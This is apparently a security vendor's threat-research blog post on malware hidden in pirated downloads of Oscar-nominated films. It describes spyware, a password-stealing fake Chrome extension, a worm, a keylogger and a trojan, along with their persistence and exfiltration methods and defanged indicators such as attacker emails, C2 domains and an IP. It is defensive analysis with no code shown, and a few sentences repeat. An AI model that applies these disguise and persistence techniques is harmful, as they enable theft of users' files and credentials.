Online piracy is a persistent problem for artists, creators, and unsuspecting users who fall victim to cyber attackers that leverage piracy to distribute malware. While online piracy has been made illegal in many countries, it is still an act perpetrated daily worldwide. In fact, a recent study by MUSO found that the number of visits to online piracy sites has increased by more than 20% compared to last year.
With the 95th Academy Awards premiering later this month, I decided to dive into the world of Hollywood film piracy and focus on some of the biggest movies from 2022. Our team collected data between January 1, 2022, through February 15, 2023, derived only from ReasonLabs users with RAV EDR and RAV Endpoint protection, who are located in over 180 countries around the world.
The data shows thousands of instances of threats including Trojans, malware, infostealers, spyware, keyloggers, and more, inside files claiming to be one of the below-mentioned films that received top nominations:
Our research shows an alignment between the number of infected films and the number of nominations they received. “Everything Everywhere All at Once” has a total of 11 nominations, had the most infected files, and is the front-runner to win Best Picture. The Best Picture winner is expected to have a significant increase in the number of pirated downloads so it seems that the dark web has spoken and cybercriminals themselves have voted for “Everything Everywhere All at Once” as the Best Picture winner.
Following “Everything Everywhere All at Once”, “Everything Everywhere All at Once” and “Avatar: The Way of Water” received numerous nominations, are up for Best Picture, and displayed large numbers of cyber threats. Unsurprisingly, threat actors are choosing to latch on to the Oscar favorites to lure fans looking for an easy download.
Let’s discuss the top five most common threat types seen lurking in downloaded files claiming to be Oscar-nominated movies.
The spyware creates persistence under “appdata\roaming\microsoft\windows\start menu\programs\startup\svchost..exe”, to make sure it will continue to run upon each restart.
It masquerades as a Microsoft file by adding “Microsoft” in the Publisher metadata info. The file is not signed and was written in .NET. In this case, it was easier to see what it is up to.
From the code, we learn that the file steals various types of documents from the user such as .doc, .xls, .xlsx, .docx, and .pdf.
The documents will then be sent to the attacker’s email address: “dspyware2011[@]gmail[.]com”. The spyware has another email address “win7mailer511[@]gmail[.]com” with their login password hard-coded.
Tar files containing the stolen documents that it created are located either in "\\Windows\\system\\wsystem.vx" or in "\\Users\\Public\\Documents\\wsystem.vx" and are sent by the spyware via email.
Accordingly, it has two scenarios it checks and operates - either with the “\\Documents\\suchost..exe” or with "\\svchost..exe".
There is a function in the code that sends files to the attacker’s email by linking the stolen files as attachments. It creates an email with identifying information of the victim, and starts an SMTP client to exfiltrate the data, using the attacker’s hard-coded email and password:
In addition, it will replicate itself into other folders, calling itself “movie.exe”.
In addition, it will replicate itself into other folders, calling itself “movie.exe”.
dspyware2011[@]gmail[.]com
win7mailer511[@]gmail[.]com
This file is a malicious installer that downloads external files to the “C:\programdata” folder, with deceiving names. It writes some of the files with the suffix “.jpg”, even though the files are .exe, .js, or .html. The malicious installer then changes the file attributes so that they are hidden and executes an encoded VBS script (V29ybQ.jpg) with the parameter “pyld.”
The contents of the JavaScript of the extension are obfuscated:
The manifest file presents an extension with the deceiving name “Chrome Webstore” and this matching description: “Discover great apps, games, extensions and themes for Google Chrome.”
We can see below that the extension injects malicious JavaScript to all web pages that the user can open in the browser (the “<all_urls>” inside “content_scripts”). In addition, it also loads an HTML file that it dropped to the extension folder at Appdata.
Translating the hex-encoded part in the obfuscated JavaScript results in an array of interesting strings in which we can see its CNC address: http[://]z3jhymjlcg[.]x10[.]bz. In addition, we can see that it targets password input boxes in the windows document to steal them.
193.32.161.73
z3jhymjlcg[.]x10[.]bz
The Bat Worm is another unsigned file, this time with file publisher '$ i l e n t $ t o r m'. Its icon is similar to the “folder” icon, so the user would think they’re clicking on a folder and not on an executable (if the file extension is not-enabled in the folder view).
The executable drops three files to disk: ”folder.bat”, “folder.exe” and “autorun.inf”. It changes their attributes to be hidden from the user so the user will not see them in the folder. In addition, it creates a scheduled task with the name “folder” to run the executable “folder.exe”.
The bat script is copying the above files to each drive in the device and then recursively copies the files to each sub-folder.
To hide from the user, the keylogger adds multiple spaces to the filename so the user will not see the name extension at first sight and has a folder icon.
This executable drops a script that constantly tracks the victim’s keyboard activity, and sends all of the stolen sensitive data to its server, at rscamnl[.]com.
This executable drops a script that constantly tracks the victim’s keyboard activity, and sends all of the stolen sensitive data to its server, at rscamnl[.]com.
More interesting strings can be found in this sample:
In addition, the keylogger creates persistence under“\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\”, so it can continue to execute, even after the system restarts.
A widespread malware found in download portals delivers a persistent malicious extension. While the Trojan file comes in the shape of a pirated movie download, it only installs malware and does not install any movies. It achieves persistence by writing to the appinit_dlls registry key - the file path of the malicious DLL that it drops to the temp folder. With appinit_dlls the DLL will be loaded to all processes that load the user32.dll.
The malicious extension is not published in the Chrome Web Store but installed locally in a temp folder. It is often called “GoogleDoc” or “App” and takes over the search engine. The number of victims is hard to measure because the extension is not on the Chrome Store, but more than 50,000 are protected against this threat.
The Trojan achieves persistence in loading the extension whenever the browser starts by modifying the browser link and adding additional command line parameters that instruct the browser also to load a local extension:
The installer kills all browser processes via WMI, drops DLLs and extension files to disk to folder %userprofile%\appdata\local\windowsapp.
It then executes cmd.exe to run the "install.bat" script which adds persistence using the appinit_dlls registry keys. This loads the malicious DLL that was also dropped to its execution folder %userprofile%\appdata\local\windowsapp\ext.dll.
The installer contains the script, the malicious extension files, and the DLL.
We can see that something is wrong with the extension by looking at its manifest file - it calls itself “Google Docs” and gives itself the most sensitive permissions:
Inside the appext.dll strings, we can see that it takes care of the extension installation and persistence.
IOCs
Examples of identifiers for the trojan executables - there are more identifiers for each category but we include the most prevalent here:
It’s important to note that pirated movie downloads often come with subtitle files and they pose a major threat to users. Even if the movies users are downloading do not contain some kind of executable, the subtitle files might be.
This is true also for the pirated movie download sites users access to download subtitles from. They can “accidentally” redirect users to a malicious website that will try to make them download files from it, even when those files have nothing to do with the wanted subtitle file.
For example, we have witnessed malware hiding in the files mentioned above:
subtitle triangle.of.sadness.2022.1080p.webdl....exe
subtitle everything everywhere all at once 2022....exe
All.quiet.on.the.western.front.2022.1080p.webrip.srt.exe
the banshees of inisherin (2022) [1080p] [webrip] [5.1] [yts.mx]\download-subtitle_pllqcy0y.exe
There are many tools available that users can utilize to shore up their cybersecurity. These tools not only include physical and digital products but also include general education. The continued push for cyber awareness by security companies and AV providers is paramount to reducing the vulnerabilities of home users, and the overall success of next-generation attacks.
Security tools such as DNS, VPN, EDR for the home, and more must be utilized by individuals, not just large corporations. Ultimately, home users’ best chances of fighting off modern cyber threats lie with the use of endpoint protection.